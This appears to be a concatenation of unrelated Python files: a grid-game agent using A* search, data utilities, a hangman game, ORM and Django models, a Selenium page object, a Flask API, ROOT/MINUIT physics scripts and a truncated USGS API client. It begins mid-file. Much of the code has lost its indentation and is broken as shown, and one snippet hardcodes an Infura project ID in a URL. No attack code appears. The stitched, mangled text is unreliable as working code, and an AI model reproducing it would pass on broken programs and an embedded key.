if (x, y) not in self.unvisitedwater and self.grid[x][y].visited == False:
self.unvisitedwater.append((x, y))
if view[i][j] == 'a' and (x, y) not in self.axe_location:
self.axe_location.append((x, y))
if view[i][j] == 'k' and (x, y) not in self.key_location:
self.key_location.append((x, y))
if view[i][j] == 'o' and (x, y) not in self.stepping_stone:
self.stepping_stone.append((x, y))
if view[i][j] == ' ' and (x, y) not in self.space_location:
self.space_location.append((x, y))
if view[i][j] == '~' and (x, y) not in self.water_location:
self.water_location.append((x, y))
if view[i][j] == 'T' and (x, y) not in self.tree_location:
self.tree_location.append((x, y))
if view[i][j] == '$' and (x, y) not in self.gold_location:
self.gold_location.append((x, y))
if view[i][j] == '-' and (x, y) not in self.door_location:
self.door_location.append((x, y))
print('At this stage, the agent direction is: ' + self.direction)
print("At this moment, the agent coordinate is: ({0}, {1})".format(self.agent_x, self.agent_y))
print('The unvisited list is: {0}'.format(self.unvisited))
def update_from_move(self, move):
front = self.get_front_tail() # get the grid in front
x, y = front.point
move = move.upper() # Convert to upper case
# if move == 'F':
# if front in ['*', '-', 'T']: # Do nothing
# return
# self.agent_x, self.agent_y = x, y # update the agent's location
# if front == 'a':
# self.axe_location.remove((x, y))
# self.inventory['a'] = True
# if front == 'k':
# self.key_location.remove((x, y))
# self.inventory['k'] = True
# if front == '$':
# self.gold_location.remove((x, y))
# self.inventory['$'] = True
# if front == 'o':
# self.stepping_stone.remove((x, y))
# self.inventory['o'] += 1
# if front == '~':
# if self.inventory['o'] <= 0 and self.inventory['r']:
# self.inventory['r'] == False
# if self.inventory['o'] >= 1:
# self.inventory['o'] -= 1
# self.water_location.remove((x, y))
if move == 'C':
self.inventory['r'] += 1
if move == 'U':
self.inventory['k'] -= 1
if self.get_front_tail().value == '~' and self.grid[x][y].value == ' ':
self.inventory['r'] -= 1
#######################################################################################
############ Line 176 to Line 237, A* algorithm #############################
#######################################################################################
def children(self, node):
x, y = node.point
result = []
for r, c in [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]:
if r >= 0 and r < len(self.grid[0]) and c >= 0 and c < len(self.grid) and self.grid[r][c].value in pickable:
result.append(self.grid[r][c])
elif self.inventory['a'] == True:
if r >= 0 and r < len(self.grid[0]) and c >= 0 and c < len(self.grid) and self.grid[r][c].value in obstacle:
result.append(self.grid[r][c])
# need to change the below statement to accept water as a path result
# elif len(self.unvisited) == 0 and (self.inventory['r'] > 0 or self.inventory['o'] > 0):
# if r >= 0 and r < len(self.grid[0]) and c >= 0 and c < len(self.grid) and self.grid[r][c].value in water:
# result.append(self.grid[r][c])
return result
def manhattan(self, a, b):
        return abs(a.point[0] - b.point[0]) + abs(a.point[1] - b.point[1])
def clean_up(self):
for row in self.grid:
for item in row:
item.parent, item.G, item.H = None, 0, 0
# this A star algorithm is adapted from https://gist.github.com/jamiees2/5531924
    # with slight modifications to serve our purpose
def aStar(self, start, goal): # each grid element is a node object
self.clean_up()
openset = set() # The open set
closedset = set() # The closed set
current = start # Current point is the starting point
openset.add(current) # Add the starting point to the open set
while openset: # While the open set is not empty
current = min(openset, key=lambda o:o.G + o.H)
if current.point == goal.point:
path = []
while current.parent:
current.visited = True
path.append(current.point)
current = current.parent
path.append(current.point)
current.visited = True
return path[::-1]
openset.remove(current) # Remove the item from the open set
closedset.add(current) # Add it to the closed set
for node in self.children(current):
if node in closedset: # If it is already in the closed set, skip it
continue
if node in openset: # Otherwise if it is already in the open set
new_g = current.G + current.move_cost(node)
if node.G > new_g:
node.G = new_g
node.parent = current
else:
node.G = current.G + current.move_cost(node)
node.H = self.manhattan(node, goal)
node.parent = current # Set the parent to our current item
openset.add(node) # Add it to the set
return None # return None if no path is found
    # If the self.unvisited list is not empty, there are still some nodes the agent hasn't visited.
    # Pop the last element off the list; if this node is adjacent to the agent, call path_to_actions with the direct path.
    # If it is not adjacent, run an A* search to get the path coordinates the agent needs to follow, then call path_to_actions to get a series of moves.
def take_action(self):
start = (self.agent_x, self.agent_y)
if self.tree_location:
tree_location = self.tree_location
if self.door_location:
door_location = self.door_location
        # check the non-empty condition first to avoid indexing an empty list
        if self.axe_location and self.axe_location[-1] == start:
            self.inventory['a'] = True
        if self.key_location and self.key_location[-1] == start:
            self.inventory['k'] += 1
        if self.gold_location and self.gold_location[-1] == start:
            self.inventory['$'] = True
## your original code, if there is unvisited land then walk around until you can't
if len(self.unvisited) != 0:
end = self.unvisited.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
## if there is a tree that you can reach and if you also have an axe, return the path to that tree
if self.tree_location:
if len(tree_location) != 0 and self.inventory['a'] == True and self.aStar(self.grid[start[0]][start[1]], self.grid[tree_location[0][0]][tree_location[0][1]]) != None:
end = tree_location.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
## same methodology as the tree, but for a door
if self.door_location:
if len(self.door_location) != 0 and self.inventory['k'] > 0 and self.aStar(self.grid[start[0]][start[1]], self.grid[door_location[0][0]][door_location[0][1]]) != None:
end = self.door_location.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
## if you have explored all unvisited white spaces and you have a raft, its now time to go on water
        if self.inventory['r'] >= 1 and self.unvisitedwater:
end = self.unvisitedwater.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
# convert a list of coordinate tuples to a list of actions
def path_to_actions(self, path):
actions = []
for i in range(len(path) - 1):
abs_x = path[i + 1][0] - path[i][0]
abs_y = path[i + 1][1] - path[i][1]
actions += mapping_table[(abs_x, abs_y, self.direction)]
if self.get_front_tail().value == 'T' and self.inventory['a'] == True:
actions.insert(-1, 'c')
            if self.get_front_tail().value == '-' and self.inventory['k'] >= 1:
actions.insert(-1, 'u')
self.direction = get_direction[(abs_x, abs_y)]
self.agent_x += abs_x
self.agent_y += abs_y
return actions
############################################################################################
######################## Above is the code for the Node and Agent classes #######################
agent = Agent()
actions = []
# function to get an action from the AI or the user
def get_action(view):
    global actions
    if len(actions) == 0:
        agent.update_from_view(view)
        new_actions = agent.take_action()
        if new_actions:  # take_action may return None when no target is reachable
            actions += new_actions
        print('The actions the agent plans to take are: {0}'.format(actions), '\n')
        if actions:
            actions.pop(0)
    else:
        print('The next planned action is: {0}'.format(actions.pop(0)), '\n')
while 1:
inp = input("Enter Action(s): ")
agent.update_from_move(inp)
return inp
# while 1:
# inp = input("Enter Action(s): ")
# inp.strip()
# final_string = ''
# for char in inp:
# if char in ['f','l','r','c','u','b','F','L','R','C','U','B']:
# final_string += char
# if final_string:
# agent.update_from_move(final_string[0])
# return final_string[0]
# helper function to print the grid
def print_grid(view):
print('+-----+')
for ln in view:
print("|"+str(ln[0])+str(ln[1])+str(ln[2])+str(ln[3])+str(ln[4])+"|")
print('+-----+')
if __name__ == "__main__":
# checks for correct amount of arguments
if len(sys.argv) != 3:
print("Usage Python3 "+sys.argv[0]+" -p port \n")
sys.exit(1)
port = int(sys.argv[2])
# checking for valid port number
if not 1025 <= port <= 65535:
print('Incorrect port number')
sys.exit()
# creates TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# tries to connect to host
# requires host is running before agent
sock.connect(('localhost',port))
except (ConnectionRefusedError):
print('Connection refused, check host is running')
sys.exit()
# navigates through grid with input stream of data
i=0
j=0
while 1:
data=sock.recv(100)
if not data:
exit()
for ch in data:
if (i==2 and j==2):
view[i][j] = '^'
view[i][j+1] = chr(ch)
j+=1
else:
view[i][j] = chr(ch)
j+=1
if j>4:
j=0
i=(i+1)%5
if j==0 and i==0:
print_grid(view) # COMMENT THIS OUT ON SUBMISSION
action = get_action(view) # gets new actions
sock.send(action.encode('utf-8'))
sock.close()
|
##### 1a. Data Utilities (15 pts)
import os
import json
def get_data(): ###Get data function
fname = os.path.join(os.path.dirname(__file__),'senate-stock-trades.json')
module = -1000000000 ### sentinel value
if module == -1000000000:
f = open(fname,)
module = json.load(f)
return module
def add_amount_ranges(amount_range_1, amount_range_2 ): ### add amount ranges function
if amount_range_1[0] != None and amount_range_2[0] != None:
sum_range_min = int(amount_range_1[0]) + int(amount_range_2[0])
else:
sum_range_min = None
if amount_range_1[1] != None and amount_range_2[1] != None:
sum_range_max = int(amount_range_1[1]) + int(amount_range_2[1])
else:
sum_range_max = None
ans = (sum_range_min, sum_range_max)
return ans
def sub_amount_ranges(amount_range_1, amount_range_2): ### Subtract amount ranges function
if amount_range_1[0] != None and amount_range_2[0] != None:
diff_range_min = int(amount_range_1[0]) - int(amount_range_2[0])
else:
diff_range_min = None
if amount_range_1[1] != None and amount_range_2[1] != None:
diff_range_max = int(amount_range_1[1]) - int(amount_range_2[1])
else:
diff_range_max = None
ans = (diff_range_min, diff_range_max)
return ans
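# Worked example: add_amount_ranges((1001, 15000), (15001, 50000)) returns
# (16002, 65000); if either bound is None, the corresponding bound of the
# result is None as well. sub_amount_ranges behaves the same way with subtraction.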
|
#!/usr/bin/python
import sys
expectedResult = [
'100000005 1',
'100000066 1',
'100000066 5',
'100002460 12',
'100003192 8',
'100003268 15',
'100004467 12',
'100004467 20',
'100004819 4',
'100005156 17',
'100007808 12',
'100008254 22',
'100010128 14',
'100012200 5',
'100019875 5',
'100020526 14',
'100071170 5',
'100071170 12',
'999999999 9',
'999999999 12'
]
pointer = 0
for line in sys.stdin:
if pointer >= len(expectedResult):
print 'Error, more lines than expected'
sys.exit(1)
if line.strip() != expectedResult[pointer]:
print 'Error in line ', pointer + 1
print 'Expected: "', expectedResult[pointer], '"'
print 'Input: "', line.strip(), '"'
sys.exit(2)
pointer += 1
if pointer < len(expectedResult):
    print 'Error, fewer lines than expected'
sys.exit(3)
print 'Test passed!'
|
def jogar():
    print("*******************************")
    print("Bem vindo ao jogo de Forca!!")
    print("*******************************")
    palavra_secreta = 'arroz'
    letras_acertadas = ["_", "_", "_", "_", "_"]
    enforcou = False
    acertou = False
    erros = 0
    print("{}".format(letras_acertadas))
    while(not enforcou and not acertou):
        chute = input("Qual Letra?")
        chute = chute.strip()  # strip surrounding whitespace
        index = 0
        for letra in palavra_secreta:
            if (chute.upper() == letra.upper()):
                letras_acertadas[index] = letra
            index = index + 1
        if chute.upper() not in palavra_secreta.upper():
            erros = erros + 1
        acertou = "_" not in letras_acertadas  # won when no blanks remain
        enforcou = erros >= 6  # hanged after 6 wrong guesses (threshold chosen here)
        print("{}".format(letras_acertadas))
if (__name__ == "__main__"):  # when run directly, __name__ is set to "__main__"
    jogar()
|
from sqlalchemy import Column, String, Integer
from bd import Base
class User(Base):
__tablename__ = 'user'
user_id = Column(Integer, primary_key=True)
firstName = Column(String)
lastName = Column(String)
gender = Column(String)
level = Column(String)
    def __init__(self, user_id, firstName, lastName, gender, level):
        self.user_id = user_id
        self.firstName = firstName
        self.lastName = lastName
self.gender = gender
self.level = level
def __repr__(self):
return "<User(user_id={}, firstName={}, lastName={}, gender={}, level={})>"\
.format(self.user_id, self.firstName, self.lastName, self.gender,self.level)
def __eq__(self, otro):
return self.user_id == otro.user_id
def __hash__(self):
return hash((self.user_id))
|
# Generated by Django 2.1.2 on 2018-11-24 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0005_basket_state_of_status'),
]
operations = [
migrations.AlterField(
model_name='basket',
name='state_of_status',
field=models.CharField(choices=[('new', 'новий'), ('executed', 'виконаний')], default='new', max_length=10, verbose_name='Статус кошика'),
),
]
|
# coding: utf-8
import cfg
import re
import codecs
def pre_train():
label_dict = {}
with open(cfg.DATA_PATH + 'evaluation_public_origin.tsv', 'r') as f:
lines = [line.strip().split('\t') for line in f.readlines()]
    # Drop samples whose article content is empty; all such samples are labelled NEGATIVE
for n, line in enumerate(lines):
if line[2] == '':
label_dict[line[0]] = 'NEGATIVE'
lines.pop(n)
    # Drop duplicate articles; if two articles are identical, both are labelled POSITIVE
content_pool = {}
for n, line in enumerate(lines):
if line[2] != '':
if line[2] not in content_pool:
content_pool[line[2]] = [n, line[0]]
else:
label_dict[line[0]] = 'POSITIVE'
                id_dup = content_pool[line[2]][1] # fetch the id of the duplicated article
                line_num = content_pool[line[2]][0] # fetch the line number of the duplicated article
label_dict[id_dup] = 'POSITIVE'
lines.pop(n)
lines.pop(line_num)
    # Pattern: starts with '{', then two or more whitespace characters or letters, then Chinese characters, then any characters, ending with '}'
PATTERN = re.compile(u'\{[\sA-Za-z:0-9\-_;\.]{2,}[\u4E00-\u9FA5]+[\s\S]*\}')
KEYS = ('pgc', 'text-decoration', 'none', 'outline', 'display', 'block', 'width',
'height', 'solid', 'position', 'relative', 'padding', 'absolute', 'background',
'top', 'left', 'right', 'cover','font-size', 'font', 'overflow', 'bold',
'hidden', 'inline', 'block', 'align', 'center', 'transform', 'space', 'vertical',
'color', 'webkit', 'translatntent')
for n, line in enumerate(lines):
key_num = 0
for key in KEYS:
if key in line[2]:
key_num += 1
if key_num >= 1:
if re.search(PATTERN, line[2].replace(' ', '')):
label_dict[line[0]] = 'NEGATIVE'
lines.pop(n)
fw = codecs.open(cfg.DATA_PATH + 'evaluation_public.tsv', 'w', encoding='utf8')
for line in lines:
fw.write('%s\n' % '\t'.join(line))
def pre_evl():
label_dict = {}
with open(cfg.DATA_PATH + 'train_origin.tsv', 'r') as f:
lines = [line.strip().split('\t') for line in f.readlines()]
for n, line in enumerate(lines):
if line[2] == '':
lines.pop(n)
content_pool = {}
for n, line in enumerate(lines):
if line[2] != '':
if line[2] not in content_pool:
content_pool[line[2]] = [n, line[0]]
else:
id_dup = content_pool[line[2]][1]
line_num = content_pool[line[2]][0]
lines.pop(n)
lines.pop(line_num)
    # Pattern: starts with '{', then two or more whitespace characters or letters, then Chinese characters, then any characters, ending with '}'
PATTERN = re.compile(u'\{[\sA-Za-z:0-9\-_;\.]{2,}[\u4E00-\u9FA5]+[\s\S]*\}')
KEYS = ('pgc', 'text-decoration', 'none', 'outline', 'display', 'block', 'width',
'height', 'solid', 'position', 'relative', 'padding', 'absolute', 'background',
'top', 'left', 'right', 'cover','font-size', 'font', 'overflow', 'bold',
'hidden', 'inline', 'block', 'align', 'center', 'transform', 'space', 'vertical',
'color', 'webkit', 'translatntent')
for n, line in enumerate(lines):
key_num = 0
for key in KEYS:
if key in line[2]:
key_num += 1
if key_num >= 1:
if re.search(PATTERN, line[2].replace(' ', '')):
lines.pop(n)
fw = codecs.open(cfg.DATA_PATH + 'train.tsv', 'w', encoding='utf8')
for line in lines:
fw.write('%s\n' % '\t'.join(line))
fw = open(cfg.DATA_PATH + 'result_part.csv', 'w')
for key in label_dict:
fw.write('%s,%s\n' % (key, label_dict[key]))
|
import json
import datetime
from web3 import Web3, HTTPProvider
postwall_artifact = json.load(open('./app/static/Postwall.json'))
postwall_address = postwall_artifact["networks"]["3"]["address"]
postwall_abi = postwall_artifact['abi']
# check the web3 provider connection
w3 = Web3(HTTPProvider('https://ropsten.infura.io/v3/c9402e213aa94b979dc80abc164c109d'))
print(f"web3 provider is connected: {w3.isConnected()}")
# instantiate postwall contract
contract = w3.eth.contract(abi=postwall_abi, address=postwall_address)
def get_posts (user = None):
# get post data from contract Postwall
posts_raw = contract.functions.getPosts().call()
    # transform post data into json format
posts_json = []
posts_display = []
post_ids = posts_raw[0]
post_timestamp = posts_raw[1]
post_author = posts_raw[2]
post_content = posts_raw[3]
for i, id in enumerate(post_ids):
posts_json.append({
"id": id,
"timestamp": datetime.datetime.utcfromtimestamp(post_timestamp[i]),
"author": post_author[i],
"content": post_content[i]})
posts_json.reverse()
if user == None:
posts_display = posts_json
else:
user = user.lower()
for post in posts_json:
if post["author"].lower() == user:
posts_display.append(post)
return posts_display
if __name__ == "__main__":
get_posts()
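# Usage sketch: get_posts() returns every post on the wall in reverse of the
# contract's order (newest first, assuming the contract appends new posts);
# get_posts("0x...") (a hypothetical address) returns only posts whose author
# matches that address, compared case-insensitively.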
|
# list (列表)
# tuple (元组)
# set (集合)
|
#!/usr/bin/env python
from main.page.desktop_v3.sales.pe_myshop_order_base import *
from selenium.webdriver.common.by import By
import time
class MyshopOrderPage(MyshopOrderBasePage):
_page = "myshop_order.pl"
#Locators
    # the search-invoice box, deadline-response select box, and search-invoice button form one set
_search_invoice_bar_loc = (By.CSS_SELECTOR, 'div.row-fluid form#form-filter div.input-append input.input-medium')
_deadline_response_select_box_loc = (By.CSS_SELECTOR, 'div.row-fluid form#form-filter div.input-append a.selectBox-dropdown')
_search_invoice_button_loc = (By.CSS_SELECTOR, 'div.row-fluid form#form-filter div.input-append button.btn')
# instance variable
#_condition_order_loc = (By.XPATH, "//*[@id='change-template']")
_condition_order_loc = (By.CSS_SELECTOR, "div#change-template")
_order_table_loc = (By.CSS_SELECTOR, "div.list-box-content table.transaction-table")
_list_order_loc = (By.XPATH, "//div[@class='list-box-content']/table")
_btn_response_loc = (By.CSS_SELECTOR, "div.dialog-footer button.btn-action")
#_after_submit_loc = (By.XPATH, "//button[text()='Ok']")
_after_submit_loc = (By.CSS_SELECTOR, "div.dialog-content div.container-fluid div.row-fluid div.dialog-footer button.btn-action")
#counter
_counter_loc = (By.XPATH, "//*[@class='count-sales-new-order-value']")
#next page
_next_page_loc = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[4]/div[2]/div/div/div[2]/div[2]/div/div/ul/li[last()]/a/strong")
#Action
def open(self, site=""):
self._open(site, self._page)
def response_order(self, inv):
found = False
#print (self.find_element(*self._condition_order_loc).text)
#condition_order = self.find_element(*self._condition_order_loc)
# if("No Order List" in condition_order.text or "Tidak ada Daftar Pemesanan" in condition_order.text):
# print("No Order List")
try:
self.find_element(*self._order_table_loc)
counter = int(self.find_element(*self._counter_loc).text)
j, r, s = 0, int(counter/10), int(counter%10)
if(s > 0):
r += 1
while j < r and not found:
print("Page", int(j+1))
list_order = self.driver.find_elements(*self._list_order_loc)
for i in list_order:
if inv in i.text:
time.sleep(2)
id_order = i.find_element(By.TAG_NAME, "tr").get_attribute("id")
time.sleep(2)
response_order = self.driver.find_element(By.XPATH, "//*[@id='"+id_order+"']/td[3]/div[3]/div/form/div[1]/div/div[2]/button")
response_order.click()
found = True
break
j += 1
if(j < r and not found):
self.next_page()
print("Next page MyshopOrder")
time.sleep(2)
if(found == True):
self.driver.find_element(*self._btn_response_loc).click()
print("Response", inv)
time.sleep(4)
self.driver.find_element(*self._after_submit_loc).click()
print ("after submit btn sukses")
if(not found):
print(inv, "not found!")
time.sleep(1)
except:
print ("No Order")
def next_page(self):
try:
next = self.driver.find_element(*self._next_page_loc)
next.click()
time.sleep(2)
except Exception as inst:
print(inst)
|
def get_sum(a,b):
num = 0
if a == b:
return b
elif b > a:
for i in range(a, b+1):
num += i
return num
else:
for i in range(b, a+1):
num += i
return num
print(get_sum(0, -1))
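# Expected output: -1, since get_sum(0, -1) sums the inclusive range [-1, 0].
# Another example: get_sum(1, 3) == 6.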
|
from flask_restful import Resource, reqparse, fields, marshal
from common.auth import authenticate
from common.misc import prevent_missing_id
from models import User as U
from models import db
from numbers import Number
import sys
import common.ws as ws
user_fields = {
'id': fields.String,
'username': fields.String
}
class PendingFriend(Resource):
    # Protected endpoint
method_decorators = [authenticate, prevent_missing_id]
# Get all pending friend requests
def get(self, user, **kwargs):
return marshal(user.pending_friends, user_fields)
# Validate a pending friend request
def post(self, id, user):
if id is None:
return {'error': 'missing slug parameter'}, 400
pending_friend = None
for i in user.pending_friends:
if i.id == id:
pending_friend = i
if pending_friend is None:
return {'error': 'pending friend not found'}, 400
# Remove pending friend request
user.pending_friends.remove(pending_friend)
# Add friends
user.friends.append(pending_friend)
pending_friend.friends.append(user)
# Commit changes
db.session.add(user)
db.session.add(pending_friend)
db.session.commit()
# WebSocket call
ws.emit_user(pending_friend, 'friend-accepted', {'user': user.username})
return {}
# Refuse a pending friend request
def delete(self, id, user):
if id is None:
return {'error': 'missing slug parameter'}, 400
pending_friend = None
for i in user.pending_friends:
if i.id == id:
pending_friend = i
if pending_friend is None:
return {'error': 'pending friend not found'}, 400
# Remove pending friend request
user.pending_friends.remove(pending_friend)
# Commit changes
db.session.add(user)
db.session.commit()
return {}
|
total_electrons = int(input())
shells = []
index = 0
while total_electrons > 0:
current_shell_electrons = 2*((index + 1) ** 2)
if total_electrons >= current_shell_electrons:
shells.insert(index, current_shell_electrons)
else:
shells.insert(index, total_electrons)
break
index += 1
total_electrons -= current_shell_electrons
print(shells)
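# Worked example: an input of 20 electrons fills shells of capacity 2*(n**2)
# as [2, 8, 10] (the third shell holds the remaining 10 of its 18 capacity).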
|
# Exercise 9.9 - Book
files = ['txt/file1.txt', 'txt/file2.txt', 'txt/file3.txt']
for filename in files:
try:
with open(filename, 'r', encoding='UTF-8') as file:
print(file.read())
except FileNotFoundError as error:
print('Arquivo não encontrado!\n')
|
#!/usr/bin/env python
#--------------------------------------------------------------------
# EXAMPLE showing how to set up a fit with MINUIT using pyroot
#--------------------------------------------------------------------
from ROOT import TMinuit, Double, Long
import numpy as np
from array import array as arr
import matplotlib.pyplot as plt
# --> define some data
ax = arr ('f', (0.05 ,0.36 ,0.68 ,0.80 ,1.09 ,1.46 ,1.71 ,1.83 ,2.44 ,2.09
,3.72 ,4.36 ,4.60) )
ay = arr ('f', (0.35 ,0.26 ,0.52 ,0.44 ,0.48 ,0.55 ,0.66 ,0.48 ,0.75 ,0.70
,0.75 ,0.80 ,0.90) )
ey = arr ('f', (0.06, 0.07, 0.05, 0.05, 0.07, 0.07, 0.09, 0.10, 0.11, 0.10,
0.11, 0.12, 0.10) )
nPoints = len ( ax )
# ---> Set parameters and function to fit
# a list with convenient names
name = ["a", "m", "b"]
# the initial values
vstart = arr('d', (1.0, 1.0, 1.0) )
# the initial step size
step = arr('d', (0.001, 0.001, 0.001) )
npar = len(name)
# function we are going to fit:
def fitfunc(x, npar, apar):
a = apar[0]
m = apar[1]
b = apar[2]
f = Double(0)
f = a*x*x + m*x + b
return f
# the function to minimize, here a chi^2-function
def calcChi2(npar, apar):
chisq = 0.0
for i in range(0, nPoints):
x = ax[i]
curFuncV = fitfunc(x, npar, apar)
curYV = ay[i]
curYE = ey[i]
chisq += ( (curYV - curFuncV)**2/(curYE**2) )
return chisq
# --- fcn -- called by MINUIT repeatedly with varying parameters
# NOTE: the function name is set via TMinuit.SetFCN
def fcn(npar, deriv, f, apar, iflag):
""" meaning of parameters:
npar: # of parameters
deriv: array of derivatives df/dp_i(x), optional
f: value of function to be minimised (typically chi2 or negLogL)
apar: the array of parameters
iflag: internal flag: 1 at first call, 3 at the last, 4 during
minimisation
"""
f[0] = calcChi2(npar, apar)
# --> set up MINUIT
myMinuit = TMinuit(npar) # initialize TMinuit with maximum of npar parameters
myMinuit.SetFCN(fcn) # set func to minimize
arglist = arr('d', 2*[0.01])# set error definition
ierflg = Long(0)
arglist[0] = 1. # 1 sigma is Delta chi^2 = 1
myMinuit.mnexcm("SET ERR", arglist, 1, ierflg)
#--> Set starting values and step sizes for parameters
for i in range(0, npar):
#Define the parameters for the fit
myMinuit.mnparm(i, name[i], vstart[i], step[i], 0, 0, ierflg)
arglist[0] = 6000 # Number of calls to FCN before giving up.
arglist[1] = 0.3 # Tolerance
myMinuit.mnexcm("MIGRAD", arglist, 2, ierflg) # execute the minimisation
#--> check TMinuit status
amin, edm, errdef = Double(0.), Double(0.), Double(0.)
nvpar, nparx, icstat = Long(0), Long(0), Long(0)
myMinuit.mnstat(amin, edm, errdef, nvpar, nparx, icstat)
#meaning of parameters:
# amin: value of fcn at minimum (=chi^2)
# edm: estimated distance to minimum
# errdef: delta_fcn used to define 1 sigma errors
# nvpar: number of variable parameters
# nparx: total number of parameters
# icstat: status of error matrix:
# 3 = accurate
# 2 = forced pos.def
# 1 = approximative
# 0 = not calculated
myMinuit.mnprin(3,amin) # print-out by Minuit
#--> get results from MINUIT
finalPar=[]
finalParErr=[]
p, pe=Double(0), Double(0)
for i in range(0, npar):
myMinuit.GetParameter(i, p, pe) # retrieve parameters and errors
finalPar.append(float(p))
finalParErr.append(float(pe))
#get covariance matrix
buf=arr('d',npar*npar*[0.])
myMinuit.mnemat(buf,npar) # retrieve error matrix
emat=np.array(buf).reshape(npar,npar)
#--> provide formatted output of results
print "\n"
print "*==*MINUIT fit completed:"
print 'fcn@minimum = %.3g'%(amin), "error code =", ierflg, "status = ", icstat
print "Results: \t value error corr.mat."
for i in range(0,npar):
print' %s: \t%10.3e +/- %.1e '%(name[i], finalPar[i], finalParErr[i]),
for j in range(0,i):
print'%+.3g'%(emat[i][j]/np.sqrt(emat[i][i])/np.sqrt(emat[j][j])),
print''
#--> plot result using matplotlib
plt.figure()
plt.errorbar(ax, ay, yerr=ey, fmt="o", label='data') # the data
x=np.arange(ax[0], ax[nPoints-1], abs( (ax[nPoints-1]-ax[0])/100.) )
y=fitfunc(x, npar, finalPar) # function at best-fit-point
plt.title("Fit Result")
plt.grid()
plt.plot(x, y, label='fit function')
plt.legend(loc=0)
plt.show()
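# Note (added, hedged): this example relies on Python 2 print syntax and the legacy
# PyROOT helpers ROOT.Double / ROOT.Long for the by-reference TMinuit arguments.
# On newer ROOT releases (>= 6.22) those helpers are no longer available;
# ctypes.c_double and ctypes.c_int are the usual replacements, and the prints
# would need Python 3 syntax.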
|
raio = float(input())
PI = 3.14159
area = PI * raio**2
print(f"A={area:.4f}")
|
"""
skim.py: a script to convert ntuples into a preselected ntuple
$ python skim.py --input=/ntuples/*.root* --output=/skims/file.root
"""
import argparse
import array
import copy
import glob
import os
import sys
import ROOT
treename = "XhhMiniNtuple"
ROOT.gROOT.SetBatch()
def main():
ops = options()
if not ops.input:
fatal("Please give a path to --input files for processing")
if not ops.output:
fatal("Please give a path to a --output directory to write to.")
if not ops.filesperjob:
fatal("Please give number of --filesperjob")
input_files = configure_input(ops.input)
for ijob, input_file_chunk in enumerate(chunkify(input_files, int(ops.filesperjob))):
output_file = os.path.join(ops.output, "skim_%04i.root" % (ijob))
skim(input_file_chunk, output_file)
def skim(input_files, output_file):
# select >=2 fat jet sample
selection = ["hcand_boosted_n >= 2",
"hcand_boosted_pt[0] > 350*1000",
"hcand_boosted_pt[1] > 250*1000",
"abs(hcand_boosted_eta[0]) < 2",
"abs(hcand_boosted_eta[1]) < 2",
"hcand_boosted_m[0] > 50*1000",
"hcand_boosted_m[1] > 50*1000",
"jet_ak2track_asso_n[0] >= 2",
"jet_ak2track_asso_n[1] >= 2",
"jet_ak2track_asso_pt[0][0] > 10*1000",
"jet_ak2track_asso_pt[0][1] > 10*1000",
"jet_ak2track_asso_pt[1][0] > 10*1000",
"jet_ak2track_asso_pt[1][1] > 10*1000",
"abs(jet_ak2track_asso_eta[0][0]) < 2.5",
"abs(jet_ak2track_asso_eta[0][1]) < 2.5",
"abs(jet_ak2track_asso_eta[1][0]) < 2.5",
"abs(jet_ak2track_asso_eta[1][1]) < 2.5",
"abs(hcand_boosted_eta[0] - hcand_boosted_eta[1]) < 1.7",
]
selection = " && ".join(["(%s)" % sel for sel in selection])
# inputs
tree = ROOT.TChain(treename)
print
for fi in input_files:
print " + %s" % (fi)
tree.Add(fi)
# skim
if tree.GetEntries() > 0:
skim = tree.CopyTree(selection)
else:
skim = tree
# write
print " o %s" % (output_file)
print
outdir = os.path.dirname(output_file)
if not os.path.isdir(outdir):
os.makedirs(outdir)
outfile = ROOT.TFile.Open(output_file, "recreate")
outfile.cd()
skim.Write()
# summarize
template = "%15s | %12s"
print
print " skim summary"
print "-"*45
print template % ("", "entries")
print "-"*45
print template % (" input", tree.GetEntries())
print template % ("output", skim.GetEntries())
print
print
print " output filesize"
print "-"*45
print " %.4f MB" % (outfile.GetSize()/pow(1024.0, 2))
print
outfile.Close()
def options():
parser = argparse.ArgumentParser()
parser.add_argument("--input")
parser.add_argument("--output")
parser.add_argument("--filesperjob")
return parser.parse_args()
def fatal(message):
sys.exit("Error in %s: %s" % (__file__, message))
def chunkify(li, chunk_size):
return (li[it : it+chunk_size] for it in xrange(0, len(li), chunk_size))
def configure_input(string):
if "root://" in string and "*" in string:
fatal("Sorry, wildcards not yet supported for root:// filesystems.")
elif "*" in string:
return sorted(glob.glob(string))
else:
return [string]
if __name__ == '__main__':
main()
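# --- Worked example (added; numbers illustrative) ---
# With --filesperjob=5 and 12 files matching --input, chunkify() yields chunks of
# 5, 5 and 2 files, and skim() writes skim_0000.root, skim_0001.root and
# skim_0002.root into the --output directory, one per chunk.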
|
import requests,os,json,arrow
from arrow import now
from shapely.geometry import shape
root = "https://earthexplorer.usgs.gov/inventory/json/v/1.4.0"
def makeApiReq(endpoint,data):
r = requests.post(f"{root}/{endpoint}",params="jsonRequest="+json.dumps(data))
return r.json()
def login():
d = makeApiReq("login",{
"username": os.environ["LS_USER"],
"password": os.environ["LS_PASS"],
"authType": "EROS",
"catalogId": "EE",
"applicationContext": "INVSC"
})
return d
def query_data(login_obj,bbox):
apikey = login_obj["data"]
nw,se = bbox["nw"],bbox["se"]
data = {
"datasetName": "LSR_LANDSAT_8_C1",
"spatialFilter": {
"filterType": "mbr",
"lowerLeft": {
"latitude": se[1],
"longitude": nw[0]
},
"upperRight": {
"latitude": nw[1],
"longitude": se[0]
}
},
"temporalFilter": {
"dateField": "search_date",
"startDate": now().shift(months=-1).isoformat(),
